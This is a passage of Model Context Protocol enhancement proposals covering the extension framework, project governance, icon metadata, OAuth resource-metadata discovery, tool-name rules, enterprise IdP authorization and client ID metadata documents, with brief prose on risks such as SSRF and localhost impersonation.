if (hasUISupport) {
// Register tools with UI features
} else {
// Register text-only fallback
}
```
#### Graceful Degradation
If one party supports an extension but the other does not, the supporting party MUST either revert to core protocol behavior or reject the request with an appropriate error if the extension is mandatory. Extensions SHOULD document their expected fallback behavior. For example, a server offering UI-enhanced tools should still return meaningful text content for clients that do not support the UI extension, while a server requiring a specific authentication extension MAY reject connections from clients that do not support it.
### Legal Requirements
#### Trademark Policy
* Use of MCP trademarks in extension identifiers does not grant trademark rights. Third parties may not use 'MCP', 'Model Context Protocol', or confusingly similar marks in ways that imply endorsement or affiliation.
* MCP makes no judgment about trademark validity of terms used in extensions.
#### Antitrust
* Extension developers acknowledge that they may compete with other participants, have no obligation to implement any extension, are free to develop competing extensions and protocols, and may license their technology to third parties including for competing solutions.
* Status as an official extension does not create an exclusive relationship.
* Extension repository maintainers act in individual capacity using best technical judgment.
#### Licensing
Official extensions MUST be available under the Apache 2.0 license.
#### Contributor License Grant
By submitting a contribution to an official MCP extension repository, you represent that:
1. You have the legal authority to grant the rights in this agreement
2. Your contribution is your original work, or you have sufficient rights to submit it
3. You grant to Linux Foundation and recipients of the specification a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable license to:
* Reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute the contribution
* Make, have made, use, offer to sell, sell, import, and otherwise transfer implementations
#### No Other Rights
Except as explicitly set forth in this section, no other patent, trademark, copyright, or other intellectual property rights are granted under this agreement, including by implication, waiver, or estoppel.
### Not Specified
This SEP does not specify all aspects of an extension system. The following is an incomplete list of what this SEP does not address:
* **Schema**: we do not specify a mechanism for extensions to advertise how they modify the schema.
* **Dependencies**: we do not specify if/how extensions may have dependencies on specific core protocol versions, or interdependencies with other extensions (or versions of extensions).
* **Profiles**: we do not specify a way of grouping extensions.
These are omitted not because they are unimportant, but because they may be added later and the goal of this SEP is simply to get some initial extension structure off the ground and defers detailed technical discussion around more complex/debatable aspects of extensions.
## Rationale
This design for extensions uses the following principles:
* **Start simple**: the intention is to have a relatively simple mechanism that allows people to start building and proposing extensions in a structured way.
* **Clear governance**: For now, the focus is on clear governance and less on implementation details.
* **Refine later**: Over time, once we have more experience with extensions, we can adjust the approach appropriately.
Some specific design choices:
* **Why extension repositories instead of individual/independent extensions?** Repositories provide a natural group and governance structure that allows for the repository maintainers to enforce structure and conformity to extensions. It avoids a failure case of different extensions in an area working in incompatible ways. Also provides a way to delegate much of the governance work.
* **Why not require core maintainer review for official extensions?** Delegated reviews allows for extensions to evolve autonomously without being bottlenecked on core maintainer review, which is already a (often months) long process.
* **Why separate versioning?** Extensions are additions to the spec and optional so there is no need to tie versions together. Separate versions allow for more rapid iteration.
## Backward Compatibility
The extension framework itself is purely additive to the core protocol, so there are no backwards compatibility concerns with the core specification.
The design described in this SEP is consistent with existing official extensions ([ext-apps](https://github.com/modelcontextprotocol/ext-apps) and [ext-auth](https://github.com/modelcontextprotocol/ext-auth)), which already use the patterns specified here for capability negotiation and extension identifiers.
However, individual extensions may have their own backwards compatibility concerns. Extensions MUST consider and account for backwards compatibility in their design, both across core protocol versions and extension versions. Breaking changes within an extension MUST use a new extension identifier (see *Definition* section). Extensions SHOULD also document their approach to backwards compatibility and stability (e.g. an extension MAY advertise itself as "experimental" indicating that it may break without notice).
## Security Implications
Extensions MUST implement all related security best practices in the area that they extend.
Clients and servers SHOULD treat any new fields or data introduced as part of an extension as untrusted and SHOULD comprehensively validate them.
## Reference Implementation
To be provided.
# SEP-932: Model Context Protocol Governance
Source: https://modelcontextprotocol.io/community/seps/932-model-context-protocol-governance
Model Context Protocol Governance
Final
Process
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 932 |
| **Title** | Model Context Protocol Governance |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-07-08 |
| **Author(s)** | David Soria Parra |
| **Sponsor** | None |
| **PR** | [#931](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/931) |
***
## Abstract
This SEP establishes the formal governance model for the Model Context Protocol (MCP) project. It defines the organizational structure, decision-making processes, and contribution guidelines necessary for transparent and effective project stewardship. The proposal introduces a hierarchical governance structure with clear roles and responsibilities, along with the Specification Enhancement Proposal (SEP) process for managing protocol changes.
## Motivation
As the Model Context Protocol grows in adoption and complexity, the need for formal governance becomes critical. The current informal decision-making process lacks:
1. **Transparency**: Community members have no clear visibility into how decisions are made
2. **Participation Pathways**: Contributors lack defined ways to influence project direction
3. **Accountability**: No formal structure exists for resolving disputes or contentious issues
4. **Scalability**: Ad-hoc processes cannot scale with growing community and technical complexity
Without formal governance, the project risks:
* Fragmentation of the ecosystem
* Unclear or inconsistent technical decisions
* Reduced community trust and participation
* Inability to effectively manage contributions at scale
## Rationale
The proposed governance model draws inspiration from successful open source projects like Python, PyTorch, and Rust. Key design decisions include:
### Hierarchical Structure
We chose a hierarchical model (Contributors → Maintainers → Core Maintainers → Lead Maintainers) that is effectively how the project decisions are made today. From there we will continue to evolve governance in the best interest of the project.
### Individual vs Corporate Membership
Membership is explicitly tied to individuals rather than companies to:
* Ensure decisions prioritize protocol integrity over corporate interests
* Prevent capture by any single organization
* Maintain continuity when individuals change employers
### SEP Process
The Specification Enhancement Proposal process ensures:
* All protocol changes undergo thorough review
* Community input is systematically collected
* Design decisions are documented for posterity
* Implementation precedes finalization
## Specification
### Governance Structure
#### Contributors
* Any individual who files issues, submits pull requests, or participates in discussions
* No formal membership or approval required
#### Maintainers
* Responsible for specific components (SDKs, documentation, etc.)
* Appointed by Core Maintainers
* Have write/admin access to their repositories
* May establish component-specific processes
#### Core Maintainers
* Deep understanding of MCP specification required
* Responsible for protocol evolution and project direction
* Meet bi-weekly for decisions
* Can veto maintainer decisions by majority vote
* Current members listed in governance documentation
#### Lead Maintainers
* Justin Spahr-Summers and David Soria Parra
* Can veto any decision
* Appoint/remove Core Maintainers
* Admin access to all infrastructure
## Backwards Compatibility
N/A
## Reference Implementation
See #931
1. **Documentation Files**:
* `/docs/community/governance.mdx` - Full governance documentation
* `/docs/community/sep-guidelines.mdx` - SEP process guidelines
## Security Implications
N/A
# SEP-973: Expose additional metadata for Implementations, Resources, Tools and Prompts
Source: https://modelcontextprotocol.io/community/seps/973-expose-additional-metadata-for-implementations-res
Expose additional metadata for Implementations, Resources, Tools and Prompts
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 973 |
| **Title** | Expose additional metadata for Implementations, Resources, Tools and Prompts |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-15 |
| **Author(s)** | [@jesselumarie](https://github.com/jesselumarie) |
| **Sponsor** | None |
| **PR** | [#973](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/973) |
***
## Abstract
This SEP proposes adding two optional fields—`icons` and `websiteUrl`. The `icons` and `websiteUrl` would be added to the `Implementation` schema so that clients can visually identify third-party implementations and link directly to their documentation. The `icons` parameter will also be added to the `Tool`, `Resource` and `Prompt` schemas. While this can be used by both servers and clients for all implementations, we expect it to be used initially for server-provided implementations.
## Motivation
### Current State
Current implementations only expose namespaced metadata, forcing clients to display generic labels with no visual cues.
### Proposed State
The proposed implementation would allow us to add visual affordances and links to documentation, making it easier to visually identify which servers/clients are providing an implementation e.g. a tool in a slash command interface:
* **Visual Affordance:** Icons make it immediately clear to users which tool or resource source is in use.
* **Discoverability:** A link to documentation (`websiteUrl`) allows clients to direct users to more information with a single click.
## Rationale
This design builds on prior work in web manifests (MDN) and consolidates community feedback:
* **Consolidation of PRs:** Merges the changes from PR #417 and PR #862 into a single, cohesive enhancement.
* **Flexible Icon Sizes:** Supports multiple icon sizes (e.g., `48x48`, `96x96`, or `any` for vector formats) to accommodate different client UI needs.
* **Optional Fields:** By making both fields optional, existing implementations remain fully compatible.
## Specification
Extend the `Implementation` object as follows:
```typescript theme={null}
/**
* A url pointing to an icon URL or a base64-encoded data URI
*
* Clients that support rendering icons MUST support at least the following MIME types:
* - image/png - PNG images (safe, universal compatibility)
* - image/jpeg (and image/jpg) - JPEG images (safe, universal compatibility)
*
* Clients that support rendering icons SHOULD also support:
* - image/svg+xml - SVG images (scalable but requires security precautions)
* - image/webp - WebP images (modern, efficient format)
*/
export interface Icon {
/**
* A standard URI pointing to an icon resource.
*
* Consumers MUST takes steps to ensure URLs serving icons are from the
* same domain as the client/server or a trusted domain.
*
* Consumers MUST take appropriate precautions when consuming SVGs as they can contain
* executable JavaScript
*
* @format uri
*/
src: string;
/** Optional override if the server’s MIME type is missing or generic. */
mimeType?: string;
/** e.g. "48x48", "any" (for SVG), or "48x48 96x96" */
sizes?: string;
}
/**
* Describes the MCP implementation
*/
export interface Implementation extends BaseMetadata {
version: string;
/**
* An optional list of icons for this implementation.
* This can be used by clients to display the implementation in a user interface.
* Each icon should have a `kind` property that specifies whether it is a data representation or a URL source, a `src` property that points to the icon file or data representation, and may also include a `mimeType` and `sizes` property.
* The `mimeType` property should be a valid MIME type for the icon file, such as "image/png" or "image/svg+xml".
* The `sizes` property should be a string that specifies one or more sizes at which the icon file can be used, such as "48x48" or "any" for scalable formats like SVG.
* The `sizes` property is optional, and if not provided, the client should assume that the icon can be used at any size.
*/
icons?: Icon[];
/**
* An optional URL of the website for this implementation.
*
* Consumers MUST takes steps to ensure URLs serving icons are from the
* same domain as the client/server or a trusted domain.
*
* Consumers MUST take appropriate precautions when consuming SVGs as they can contain
* executable JavaScript
*
* @format: uri
*/
websiteUrl?: string;
}
```
Extend the `Tool`, `Resource` and `Prompt` interfaces with the following type:
```typescript theme={null}
/**
* An optional list of icons for a resource.
* This can be used by clients to display the resource's icon in a user interface.
* Each icon should have a `kind` property that specifies whether it is a data representation or a URL source, a `src` property that points to the icon file or data representation, and may also include a `mimeType` and `sizes` property.
* The `mimeType` property should be a valid MIME type for the icon file, such as "image/png" or "image/svg+xml".
* The `sizes` property should be a string that specifies one or more sizes at which the icon file can be used, such as "48x48" or "any" for scalable formats like SVG.
* The `sizes` property is optional, and if not provided, the client should assume that the icon can be used at any size.
*/
icons?: Icon[];
```
## Backwards Compatibility
Both icons and websiteUrl are optional fields; clients that ignore them will fall back to existing behavior.
## Security Implications
This shouldn't introduce any new security implications.
# SEP-985: Align OAuth 2.0 Protected Resource Metadata with RFC 9728
Source: https://modelcontextprotocol.io/community/seps/985-align-oauth-20-protected-resource-metadata-with-rf
Align OAuth 2.0 Protected Resource Metadata with RFC 9728
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 985 |
| **Title** | Align OAuth 2.0 Protected Resource Metadata with RFC 9728 |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-16 |
| **Author(s)** | sunishsheth2009 |
| **Sponsor** | None |
| **PR** | [#985](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/985) |
***
## Abstract
This proposal brings the MCP spec's handling of OAuth 2.0 Protected Resource Metadata in line with [RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728#name-obtaining-protected-resourc).
Currently, the MCP spec requires the use of the HTTP WWW-Authenticate header when returning a 401 Unauthorized to indicate the location of the protected resource metadata. However, [RFC 9728, Section 5](https://datatracker.ietf.org/doc/html/rfc9728#section-5) states:
“A protected resource MAY use the WWW-Authenticate HTTP response header field, as discussed in RFC 9110, to return a URL to its protected resource metadata to the client.”
This suggests that the MCP spec could be made more flexible while still maintaining RFC compliance.
## Rationale
Many large-scale, dynamic, multi-tenant environments rely on a centralized authentication service separate from the backend resource servers. In such deployments, injecting WWW-Authenticate headers from backend services is non-trivial due to separation of concerns and infrastructure complexity.
In these scenarios, having the option to discover metadata via a well-known URL provides a practical path forward for easier MCP adoption. Requiring only the header would impose significant communication overhead between components, especially when hundreds or thousands of MCP instances are created and destroyed dynamically. Also if there are specific managed MCP servers, adopting headers across centralized system would add significant overhead.
While this increases complexity for clients—who must now implement logic to probe metadata endpoints—it reduces friction for server deployments and may encourage broader adoption. There are tradeoffs:
Pros for Server Developers: Avoid complex header injection; simplifies integration in distributed environments.
Cons for Client Developers: Clients must fall back to metadata discovery logic when the header is absent, increasing client complexity.
## Proposed State
Update the MCP spec to:
```
Clients MUST interpret the WWW-Authenticate header, and fallback to probing for metadata if not present.
Servers SHOULD return the WWW-Authenticate header
```
**The reason for deviating a bit on the RFC:**
Go with SHOULD over MAY for WWW-Authenticate is that it makes supporting other features, such as incremental authorization easier (e.g. you make a request for a tool, but need additional scopes, and receive a WWW-Authenticate challenge indicating the scopes).
Based on the above, following the updated flow:
* Attempt the MCP request without a token.
* If a 401 Unauthorized response is received: Check for a WWW-Authenticate header. If present and includes the resource\_metadata parameter, use it to locate the resource metadata.
* If the header is absent or does not include resource\_metadata, fallback to requesting /.well-known/oauth-protected-resource.
This change allows more flexible deployment models without removing existing capabilities.
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
Note over C: Attempt unauthenticated MCP request
C->>M: MCP request without token
M-->>C: HTTP 401 Unauthorized (may include WWW-Authenticate header)
alt Header includes resource_metadata
Note over C: Extract resource_metadata URL from header
C->>M: GET resource_metadata URI
M-->>C: Resource metadata with authorization server URL
else No resource_metadata in header
Note over C: Fallback to metadata probing
C->>M: GET /.well-known/oauth-protected-resource
alt Metadata found
M-->>C: Resource metadata with authorization server URL
else Metadata not found
Note over C: Abort or use pre-configured values
end
end
Note over C: Validate RS metadata, build AS metadata URL
C->>A: GET /.well-known/oauth-authorization-server
A-->>C: Authorization server metadata
Note over C,A: OAuth 2.1 authorization flow happens here
C->>A: Token request
A-->>C: Access token
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Backward Compatibility
This proposal is fully backward-compatible.
It retains support for the WWW-Authenticate header (already in the spec) and introduces a fallback mechanism using the .well-known metadata path, which is already defined in MCP as a MUST-support location.
Clients that already support metadata probing benefit from improved interoperability. Servers are not required to emit the WWW-Authenticate header if it is infeasible, but doing so is still encouraged to reduce client complexity and enable future extensibility.
# SEP-986: Specify Format for Tool Names
Source: https://modelcontextprotocol.io/community/seps/986-specify-format-for-tool-names
Specify Format for Tool Names
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 986 |
| **Title** | Specify Format for Tool Names |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-16 |
| **Author(s)** | kentcdodds |
| **Sponsor** | None |
| **PR** | [#986](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/986) |
***
## Abstract
The Model Context Protocol (MCP) currently lacks a standardized format for tool names, resulting in inconsistencies and confusion for both implementers and users. This SEP proposes a clear, flexible standard for tool names: tool names should be 1–64 characters, case-sensitive, and may include alphanumeric characters, underscores (\_), dashes (-), dots (.), and forward slashes (/). This aims to maximize compatibility, clarity, and interoperability across MCP implementations while accommodating a wide range of naming conventions.
## Motivation
Without a prescribed format for tool names, MCP implementations have adopted a variety of naming conventions, including different separators, casing, and character sets. This inconsistency can lead to confusion, errors in tool invocation, and difficulties in documentation and automation. Standardizing the allowed characters and length will:
* Make tool names predictable and interoperable across clients.
* Allow for hierarchical and namespaced tool names (e.g., using / and .).
* Support both human-readable and machine-generated names.
* Avoid unnecessary restrictions that could block valid use cases.
## Rationale
Community discussion highlighted the need for flexibility in tool naming. While some conventions (like lower-kebab-case) are common, many tools and clients use uppercase, underscores, dots, and slashes for namespacing or clarity. The proposed pattern—allowing a-z, A-Z, 0-9, \_, -, ., and /—is based on patterns used in major clients (e.g., VS Code, Claude) and aligns with common conventions in programming and APIs. Restricting spaces and commas avoids parsing issues and ambiguity. The length limit (1–64) is generous enough for most use cases but prevents abuse.
## Specification
* Tool names SHOULD be between 1 and 64 characters in length (inclusive).
* Tool names are case-sensitive.
* Allowed characters: uppercase and lowercase ASCII letters (A-Z, a-z), digits
(0-9), underscore (\_), dash (-), dot (.), and forward slash (/).
* Tool names SHOULD NOT contain spaces, commas, or other special characters.
* Tool names SHOULD be unique within their namespace.
* Example valid tool names:
* getUser
* user-profile/update
* DATA\_EXPORT\_v2
* admin.tools.list
## Backwards Compatibility
This change is not backwards compatible for existing tools that use disallowed characters or exceed the new length limits. To minimize disruption:
* Existing non-conforming tool names SHOULD be supported as aliases for at least one major version, with a deprecation warning.
* Tool authors SHOULD update their documentation and code to use the new format.
* A migration guide SHOULD be provided to assist implementers in updating their tool names.
## Reference Implementation
A reference implementation can be provided by updating the MCP core library to enforce the new tool name validation rules at registration time. Existing tools can be updated to provide aliases for their new conforming names, with warnings for deprecated formats. Example code and migration scripts can be included in the MCP repository.
## Security Implications
None. Standardizing tool name format does not introduce new security risks.
# SEP-990: Enable enterprise IdP policy controls during MCP OAuth flows
Source: https://modelcontextprotocol.io/community/seps/990-enable-enterprise-idp-policy-controls-during-mcp-o
Enable enterprise IdP policy controls during MCP OAuth flows
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------- |
| **SEP** | 990 |
| **Title** | Enable enterprise IdP policy controls during MCP OAuth flows |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-06-04 |
| **Author(s)** | Aaron Parecki ([@aaronpk](https://github.com/aaronpk)) |
| **Sponsor** | None |
| **PR** | [#646](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/646) |
***
## Abstract
This extension is designed to facilitate secure and interoperable authorization of MCP clients within corporate environments, leveraging existing enterprise identity infrastructure.
* For end users, this removes the need to manually connect and authorize the MCP Client to individual services within the organization.
* For enterprise admins, this enables visibility and control over which MCP Servers are able to be used within the organization.
## How Has This Been Tested?
We have an end to end implementation of this [here](https://github.com/oktadev/okta-cross-app-access-mcp), and in-progress MCP implementations with some partners.
## Breaking Changes
This is designed to augment the existing OAuth profile by providing an alternative when used under an enterprise IdP. MCP clients can opt in to this profile when necessary.
## Additional Context
For more background on this problem, you can refer to my blog post about this here:
[Enterprise-Ready MCP](https://aaronparecki.com/2025/05/12/27/enterprise-ready-mcp)
I also presented this at the MCP Dev Summit in May.
A high level overview of the flow is below:
```mermaid theme={null}
sequenceDiagram
participant UA as Browser
participant C as MCP Client
participant MAS as MCP Authorization Server
participant MRS as MCP Resource Server
participant IdP as Identity Provider
rect rgb(255,255,225)
C-->>UA: Redirect to IdP
UA->>+IdP: Redirect to IdP
Note over IdP: User Logs In
IdP-->>-UA: IdP Authorization Code
UA->>C: IdP Authorization Code
C->>+IdP: Token Request with IdP Authorization Code
IdP-->-C: ID Token
end
note over C: User is logged in to MCP Client. Client stores ID Token.
C->+IdP: Exchange ID Token for ID-JAG
note over IdP: Evaluate Policy
IdP-->-C: Responds with ID-JAG
C->+MAS: Token Request with ID-JAG
note over MAS: Validate ID-JAG
MAS-->-C: MCP Access Token
loop
C->>+MRS: Call MCP API with Access Token
MRS-->>-C: MCP Response with Data
end
```
> \[!IMPORTANT]
> **State:** Ready to Review
# SEP-991: Enable URL-based Client Registration using OAuth Client ID Metadata Documents
Source: https://modelcontextprotocol.io/community/seps/991-enable-url-based-client-registration-using-oauth-c
Enable URL-based Client Registration using OAuth Client ID Metadata Documents
Final
Standards Track
| Field | Value |
| ------------- | ----------------------------------------------------------------------------------------------------------------- |
| **SEP** | 991 |
| **Title** | Enable URL-based Client Registration using OAuth Client ID Metadata Documents |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-07 |
| **Author(s)** | Paul Carleton ([@pcarleton](https://github.com/pcarleton)) Aaron Parecki ([@aaronpk](https://github.com/aaronpk)) |
| **Sponsor** | None |
| **PR** | [#991](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/991) |
***
## Abstract
This SEP proposes adopting OAuth Client ID Metadata Documents as specified in [draft-parecki-oauth-client-id-metadata-document-03](https://datatracker.ietf.org/doc/draft-parecki-oauth-client-id-metadata-document/) as an additional client registration mechanism for the Model Context Protocol (MCP). This approach allows OAuth clients to use HTTPS URLs as client identifiers, where the URL points to a JSON document containing client metadata. This specifically addresses the common MCP scenario where servers and clients have no pre-existing relationship, enabling servers to trust clients without pre-coordination while maintaining full control over access policies.
## Motivation
The Model Context Protocol currently supports two client registration approaches:
1. **Pre-registration**: Requires either client developers or users to manually register clients with each server
2. **Dynamic Client Registration (DCR)**: Allows just-in-time registration by sending client metadata to a register endpoint on the Authorization server.
Both approaches have significant limitations for MCP's use case where clients frequently need to connect to servers they've never encountered before:
* Pre-registration by developers is impractical as servers may not exist when clients ship
* Pre-registration by users creates poor UX requiring manual credential management
* DCR requires servers to manage unbounded databases, handle expiration, and trust self-asserted metadata
### The Target Use Case: No Pre-existing Relationship
This proposal specifically targets the common MCP scenario where:
* A user wants to connect a client to a server they've discovered
* The client developer has never heard of this server
* The server operator has never heard of this client
* Both parties need to establish trust without prior coordination
For scenarios with pre-existing relationships, pre-registration remains the optimal solution. However, MCP's value comes from its ability to connect arbitrary clients and servers, making the "no pre-existing relationship" case critical to address.
Relatedly, there are many more MCP servers than there are clients (similar to how there are many more web browsers than API's). A common scenario is an MCP server developer wanting to restrict usage to a set of clients they trust.
### Key Innovation: Server-Controlled Trust Without Pre-Coordination
Client ID Metadata Documents enable a unique trust model where:
1. **Servers can trust clients they've never seen before** based on:
* The HTTPS domain hosting the metadata
* The metadata content itself
* Domain reputation and security policies
2. **Servers maintain full control** through flexible policies:
* **Open Servers**: Can accept any HTTPS client\_id, enabling maximum interoperability
* **Protected Servers**: Can restrict to trusted domains or specific clients
3. **No client pre-coordination required**:
* Clients don't need to know about servers in advance
* Clients just need to host their metadata document
* Trust flows from the client's domain, not prior registration
## Specification Changes
The change to the specification will be adding Client ID Metadata documents as a SHOULD, and changing DCR to a MAY, as we think that Client ID Metadata documents are a better default option for this scenario.
We will primarily rely on the text in the linked RFC, aiming not to repeat most of it. Below is a short version of what we'll need to specify.
```mermaid theme={null}
sequenceDiagram
participant User
participant Client as MCP Client
participant Server as Authorization Server
participant Metadata as Metadata Endpoint (Client's HTTPS URL)
participant Resource as MCP Server
Note over Client,Metadata: Client hosts metadata at https://app.example.com/oauth/metadata.json
User->>Client: Initiates connection to MCP Server
Client->>Server: Authorization Request client_id=https://app.example.com/oauth/metadata.json redirect_uri=http://localhost:3000/callback
Note over Server: Authenticates user
Note over Server: Detects URL-formatted client_id
Server->>Metadata: GET https://app.example.com/oauth/metadata.json
Metadata-->>Server: JSON Metadata Document {client_id, client_name, redirect_uris, ...}
Note over Server: Validates: 1. client_id matches URL 2. redirect_uri in allowed list 3. Document structure valid 4. Domain allowed via trust policy
alt Validation Success
Server->>User: Display consent page with client_name
User->>Server: Approves access
Server->>Client: Authorization code via redirect_uri
Client->>Server: Exchange code for token client_id=https://app.example.com/oauth/metadata.json
Server-->>Client: Access token
Client->>Resource: MCP requests with access token
Resource-->>Client: MCP responses
else Validation Failure
Server->>User: Error response error=invalid_client or invalid_request
end
Note over Server: Cache metadata for future requests (respecting HTTP cache headers)
```
### Client Requirements
* Clients MUST host their metadata document at an HTTPS URL following RFC requirements
* The client\_id URL MUST use "https" scheme and contain a path component
* Metadata documents MUST be valid JSON and include at minimum:
* `client_id`: matching the document URL exactly
* `client_name`: human-readable name for authorization prompts
* `redirect_uris`: array of allowed redirect URIs
* `token_endpoint_auth_method`: "none" for public clients
Note a client can use `private_key_jwt` for a `token_endpoint_auth_method` given the client metadata can provide public key information.
### Server Requirements
* Servers SHOULD fetch metadata documents when encountering URL-formatted client\_ids
* Servers MUST validate the fetched document contains matching client\_id
* Servers SHOULD cache metadata respecting HTTP headers (max 24 hours recommended)
* Servers MUST validate redirect URIs match those in metadata document
### Discovery
* Servers advertise support via OAuth metadata: `client_id_metadata_document_supported: true`
* Clients detect support and can fallback to DCR or pre-registration if unavailable
Example metadata document:
```json theme={null}
{
"client_id": "https://app.example.com/oauth/client-metadata.json",
"client_name": "Example MCP Client",
"client_uri": "https://app.example.com",
"logo_uri": "https://app.example.com/logo.png",
"redirect_uris": [
"http://127.0.0.1:3000/callback",
"http://localhost:3000/callback"
],
"grant_types": ["authorization_code"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
```
### Integration with Existing MCP Auth
This proposal adds Client ID Metadata Documents as a third registration option alongside pre-registration and DCR. Servers MAY support any combination of these approaches:
* Pre-registration remains unchanged
* DCR remains unchanged
* Client ID Metadata Documents are detected by URL-formatted client\_ids, and server support is advertised in OAuth metadata.
## Rationale
### Why This Solves the "No Pre-existing Relationship" Problem
Unlike pre-registration which requires coordination, or DCR which requires servers to manage a registration database, Client ID Metadata Documents provide:
1. **Verifiable Identity**: The HTTPS URL serves as both identifier and trust anchor
2. **No Coordination Needed**: Clients publish metadata, servers consume it
3. **Flexible Trust Policies**: Servers decide their own trust criteria without requiring client changes
4. **Stable Identifiers**: Unlike DCR's ephemeral IDs, URLs are stable and auditable
### Redirect URI Attestation
A key benefit of Client ID Metadata Documents is attestation of redirect URIs:
1. **The metadata document cryptographically binds redirect URIs to the client identity** via HTTPS
2. **Servers can trust that redirect URIs in the metadata are controlled by the client** - not attacker-supplied
3. **This prevents redirect URI manipulation attacks** common with self-asserted registration
### Risks of this approach
#### Risk: Localhost URL Impersonation
A limitation of Client ID Metadata Documents is that they cannot prevent localhost URL impersonation by itself. An attacker can claim to be any client by:
1. Providing the legitimate client's metadata URL as their client\_id
2. Binding to the same localhost port the legitimate client uses
3. Intercepting the authorization code when the user approves
This attack is concerning because the server sees the correct metadata
document and the user sees the correct client name, making detection
difficult.
Platform-specific attestations (iOS DeviceCheck, Android
Play Integrity) could address this, but they're not universally available. This
would work by a developer running a backend service that consumes the DeviceCheck / Play Integrity
signatures and returns a JWT usable as the `private_key_jwt` authentication for the `token_endpoint_auth_method`.
A similar approach without requiring platform-specific attestations that still raises the cost of the attack
is possible using JWKS and short-lived JWTs signed by a server-side component hosted by the client developer. This component could use attestation mechanisms other than platform-specific ones to attest to the clients identity, such as the client's standard login flow. Using short lived JWTs reduces the risk of credential compromise and replay, but does not eliminate it
entirely - an attacker could still proxy requests to the legitimate
client's signing endpoint.
Fully mitigating this risk is outside the scope of this proposal. This
proposal has the same risks as DCR does in a localhost redirect scenario.
Servers SHOULD display additional warnings for localhost-only clients.
#### Risk: Server Side Request Forgery (SSRF)
The authorization server takes a URL as input from an unknown client, and then fetches that URL. A malicious client could use this to send non-metadata requests on behalf of the authorization server. An example would be sending a URL corresponding to a private administration endpoint that the authorization server has access to.
This can be prevented by validating the URL's and the IP's those URL's resolve to prior to initiating a fetch request.
#### Risk: Distributed Denial of Service (DDoS)
Similarly, an attacker could try to leverage a pool of authorization servers to perform a denial of service attack on a non-MCP server.
There is not any additional amplification for the fetch request (i.e. the bandwidth from the client to make the request roughly equals the bandwidth of the request sent to the target server), and each authorization server can aggressively cache the result of these metadata fetches, so it is unlikely to be an attractive DDoS vector.
#### Risk: Maturity of referenced specification
The RFC for Client ID Metadata documents is still a draft. It has been implemented by the platform Bluesky, but has not been ratified or very widely adopted outside of that, and may evolve over time. Our intention is to evolve and align with subsequent drafts and any final standard, while minimizing disruption and breakage with existing implementations.
This approach has the risk that there are implementation challenges or flaws in the protocol that have not surfaced yet. However, even though DCR has been ratified, and it also has a number of implementation challenges that developers are facing when trying to use it in an open ecosystem context like MCP. Those challenges are the motiviation behind this proposal.
#### Risk: Client implementation burden, espcially local clients
This specification requires an additional piece of infrastructure for clients, since they need to host a metadata file behind an HTTPS url. Without this specification, a client could be strictly a desktop application for example.
The burden of hosting this endpoint is expected to be low as hosting a static JSON file is fairly straightforward and most known clients have a webpage advertising their client or providing download links.
#### Risk: Fragmentation of authorization approaches
Authorization for MCP is already challenging to fully implement for clients and servers. Questions about how to do it correctly and best practices are some of the most common in the community. Adding another branch to the authorization flow means this could be even more complicated and fractured, meaning fewer developers succeed in following the specification, and the promise of compatibility and an open ecosystem suffers as a result.
This proposal intends to simplify the story for authorization server and resource server developers by providing a clearer mechanism to trust redirect URIs and less operational overhead. This proposal depends on that simplicity being clearly the better option for most folks, which will drive more adoption and end up being the most supported option. If we do not believe that it is clearly the better option, then we should not adopt this proposal.
This proposal also provides a unified mechanism for both open servers and servers that want to restrict which clients can be used. Alternatives to this proposal require that clients and servers implement different mechanisms for the open and protected use cases.
## Alternatives Considered
1. **Enhanced DCR with Software Statements**: More complex, requires JWKS hosting and JWT signing
2. **Mandatory Pre-registration**: Poor developer and user experience for MCP's distributed ecosystem
3. **Mutual TLS**: Requires trusting a client certificate authority, impractical in an open ecosystem
4. **Status Quo**: Continues current pain points for server implementers
Client ID Metadata document is a strict improvement over DCR for the most common open-ecosystem use case. It can be further extended in the future to better support things like OS-level attestations and jwks\_uri's.
## Backward Compatibility
This proposal is fully backward compatible:
* Existing pre-registered clients continue working unchanged
* Existing DCR implementations continue working unchanged
* Servers can adopt Client ID Metadata Documents incrementally
* Clients can detect support and fall back to other methods
## Prototype Implementation
A prototype implementation is available [here](https://github.com/modelcontextprotocol/typescript-sdk/pull/839) demonstrating:
1. Client-side metadata document hosting
2. Server-side metadata fetching and validation
3. Integration with existing MCP OAuth flows
4. Proper error handling and fallback behavior
## Security Implications
1. **Phishing Prevention**: Display client hostname prominently
2. **SSRF Protection**: Validate URLs, limit response size, timeout requests, rate limit outbound requests
### Best Practices
* Only fetch client metadata after authenticating the user
* Implement rate limiting on outbound metadata fetches
* Consider additional warnings for new/unknown/localhost domains
* Log metadata fetch failures for monitoring
## References
* [draft-parecki-oauth-client-id-metadata-document-03](https://www.ietf.org/archive/id/draft-parecki-oauth-client-id-metadata-document-03.txt)
* [OAuth 2.1](https://datatracker.ietf.org/doc/draft-ietf-oauth-v2-1/)
* [RFC 7591 - OAuth 2.0 Dynamic Client Registration](https://www.rfc-editor.org/rfc/rfc7591.html)
